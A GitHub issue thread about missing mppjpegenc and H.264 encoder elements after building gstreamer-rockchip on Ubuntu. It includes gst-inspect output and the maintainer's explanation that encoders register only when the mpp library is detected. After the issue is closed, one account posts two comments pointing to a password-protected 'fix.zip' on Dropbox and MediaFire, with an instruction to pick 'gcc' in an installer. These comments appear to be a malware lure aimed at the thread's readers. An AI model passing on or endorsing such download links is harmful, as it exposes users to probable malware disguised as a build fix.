JeffyCN/rockchip_mirrors #49: 重新源码编译rocketchip-mpp后缺失mppjpegenc和h264的mpp

huafengq, 2024-08-26:
在Ubuntu 22.04下，从https://github.com/JeffyCN/rockchip_mirrors/的源码gstreamer-rockchip编译后，只有三个mpp编解码支持。麻烦帮忙看看为什么缺少了mppjpegenc和h264的mpp？谢谢！

root@dcic:/# gst-inspect-1.0 | grep mpp
rockchipmpp:  mppjpegdec: Rockchip's MPP JPEG image decoder
rockchipmpp:  mppvideodec: Rockchip's MPP video decoder
rockchipmpp:  mppvpxalphadecodebin: VP8/VP9 Alpha Decoder
typefindfunctions: audio/x-musepack: mpc, mpp, mp+
root@dcic:/# gst-inspect-1.0 mppjpegdec
Factory Details:
  Rank                     primary + 1 (257)
  Long-name                Rockchip's MPP JPEG image decoder
  Klass                    Decoder/Image
  Description              JPEG hardware decoder
  Author                   Randy Li <randy.li@rock-chips.com>, Jeffy Chen <jeffy.chen@rock-chips.com>

Plugin Details:
  Name                     rockchipmpp
  Description              Rockchip Mpp Video Plugin
  Filename                 /usr/lib/aarch64-linux-gnu/gstreamer-1.0/libgstrockchipmpp.so
  Version                  1.14.4
  License                  LGPL
  Source module            gst-rockchip
  Binary package           GStreamer Rockchip Plug-ins
  Origin URL               Unknown package origin

JeffyCN, 2024-08-26:
this plugin depends on mpp, please make sure that your mpp is working well before using this plugin.

JeffyCN, 2024-08-26:
this plugin would try to detect mpp before registering encoders, because some encoders are not available in some old chips.

closed 2024-08-26 by JeffyCN

GendiAstaNugraha, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

GendiAstaNugraha, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."